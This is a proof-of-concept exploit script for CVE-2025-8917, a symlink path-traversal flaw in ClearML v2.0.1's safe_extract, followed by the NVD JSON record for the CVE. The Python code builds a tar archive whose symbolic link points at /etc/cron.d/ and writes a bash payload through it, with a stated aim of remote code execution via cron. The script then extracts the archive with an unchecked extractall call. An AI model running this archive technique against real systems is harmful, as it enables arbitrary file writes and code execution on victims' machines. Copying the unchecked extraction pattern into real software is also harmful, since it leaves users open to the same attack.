CVE-2025-8917

#!/usr/bin/env python3 """ CVE-2025-8917 PoC - Path Traversal via Symbolic Links in safe_extract Target: allegroai/clearml v2.0.1 Vulnerability: Improper handling of symbolic/hard links in safe_extract function """ import tarfile import os import io def create_malicious_tar(output_path, target_path): """ Create a malicious tar archive that exploits the path traversal vulnerability by using a symbolic link pointing outside the extraction directory. """ with tarfile.open(output_path, 'w') as tar: # Step 1: Add a symbolic link pointing to a sensitive location symlink_info = tarfile.TarInfo(name='evil_link') symlink_info.type = tarfile.SYMTYPE symlink_info.linkname = target_path tar.addfile(symlink_info) # Step 2: Add a file through the symbolic link # This file will be written to target_path instead of the extraction dir content = b"#!/bin/bash\nid > /tmp/pwned\n" file_info = tarfile.TarInfo(name='evil_link/payload.sh') file_info.size = len(content) tar.addfile(file_info, io.BytesIO(content)) def exploit(target_path="/tmp/clearml_exploit"): """ Main exploit function: 1. Create malicious tar archive 2. Simulate safe_extract call (vulnerable version) 3. Demonstrate arbitrary file write """ os.makedirs(target_path, exist_ok=True) tar_path = os.path.join(target_path, "malicious.tar") # Create malicious archive targeting /etc/cron.d/ for RCE create_malicious_tar(tar_path, "/etc/cron.d/") print(f"[+] Malicious tar created at: {tar_path}") print(f"[+] When extracted via vulnerable safe_extract(),") print(f" payload.sh will be written to /etc/cron.d/payload.sh") print(f"[+] This achieves arbitrary file write outside extraction dir") # Simulate the vulnerable extraction extract_dir = os.path.join(target_path, "extracted") os.makedirs(extract_dir, exist_ok=True) with tarfile.open(tar_path, 'r') as tar: # VULNERABLE: safe_extract does not validate symlink targets # In the fixed version, this would check that link targets # are within the extraction directory tar.extractall(path=extract_dir) print(f"[+] Extraction complete. Check {extract_dir} and target paths.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-8917", "sourceIdentifier": "[email protected]", "published": "2025-10-05T11:16:03.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in allegroai/clearml version v2.0.1 allows for path traversal due to improper handling of symbolic and hard links in the `safe_extract` function. This flaw can lead to arbitrary file writes outside the intended directory, potentially resulting in remote code execution if critical files are overwritten."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/allegroai/clearml/commit/64fb2bcbdbb87a74af90dd723d5ef4a99fceeb73", "source": "[email protected]"}, {"url": "https://huntr.com/bounties/588fcdd1-fea4-4cc2-a9f8-851701dcb576", "source": "[email protected]"}, {"url": "https://huntr.com/bounties/588fcdd1-fea4-4cc2-a9f8-851701dcb576", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}